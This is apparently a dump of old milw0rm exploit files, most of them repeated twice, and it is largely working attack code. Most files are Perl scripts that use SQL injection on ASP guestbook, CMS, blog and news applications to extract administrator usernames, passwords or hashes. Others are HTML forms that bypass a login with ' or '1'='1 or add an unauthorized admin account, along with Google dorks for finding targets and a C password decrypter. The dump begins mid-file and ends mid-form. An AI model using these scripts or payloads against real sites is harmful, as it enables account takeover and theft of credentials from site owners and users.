print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n";
# milw0rm.com [2006-02-06]
#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006
use LWP::UserAgent;
use HTTP::Cookies;
$Server = $ARGV[0];
if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print
}
else {
print $error;
}
if(!$Server) {usage();exit() ;}
head();
print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);
$res = $xpl->post(
$Server.'check_user.asp',
Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-',
],
);
# Create a request
my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp'
);
$req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req);
$info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}
#Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n";
sub head()
{
print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n";
# milw0rm.com [2006-02-06]

View file

@ -1,50 +1,50 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n";
exit(); }
if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n";
exit(); }
}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n";
exit(); }
if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n";
exit(); }
}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19]

View file

@ -1,70 +1,70 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV < 3){
print "
+***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n";
print $penta "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV < 3){
print "
+***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n";
print $penta "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]

View file

@ -1,36 +1,36 @@
<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
alert("Please enter site!");
return false;
}
if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit();
}
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
alert("Please enter site!");
return false;
}
if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit();
}
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]

View file

@ -1,66 +1,66 @@
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to
make your own decrypter
-->
<--C Source-->
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04]
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to
make your own decrypter
-->
<--C Source-->
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04]

View file

@ -1,68 +1,68 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07]

View file

@ -1,55 +1,55 @@
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0];
my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r);
print "|***| Connected !\r\n";
if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else {
die "\r\n|***| ".$res->status_line;
}
# milw0rm.com [2006-03-09]
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0];
my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r);
print "|***| Connected !\r\n";
if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else {
die "\r\n|***| ".$res->status_line;
}
# milw0rm.com [2006-03-09]

View file

@ -1,57 +1,57 @@
<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
if (document.xplt.victim.value=="") {
alert("Please enter site!");
return false;
}
if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit();
}
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09]
<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
if (document.xplt.victim.value=="") {
alert("Please enter site!");
return false;
}
if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit();
}
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
